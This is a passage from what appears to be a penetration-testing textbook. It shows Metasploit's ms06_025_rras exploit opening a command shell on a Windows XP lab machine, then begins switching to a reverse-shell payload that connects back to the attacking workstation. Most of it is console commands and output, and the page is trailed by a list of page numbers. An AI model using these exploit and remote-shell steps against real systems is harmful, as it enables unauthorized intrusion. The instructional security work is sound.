0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Bound to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Getting OS...
[*] Calling the vulnerable function on Windows XP...
[*] Command shell session 1 opened (192.168.1.113:2347 -> 192.168.1.220:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\SAFE_NT\system32>echo w00t!
echo w00t!
w00t!
D:\SAFE_NT\system32>
It worked!We can verify the connection on a separate command prompt from a local
high port to the remote port 4444 using netstat.
C:\tools>netstat -an | findstr .220 | findstr ESTAB
TCP 192.168.1.113:3999 192.168.1.220:4444 ESTABLISHED
Let??™s go back in using the same exploit but instead swap in a payload that connects back
from the remote system to the local attack workstation for the command shell. Subsequent
exploit attempts for this specific vulnerability might require a reboot of the target.
msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_025_rras) > show options
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
The reverse shell payload has a new required option.
Pages:
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216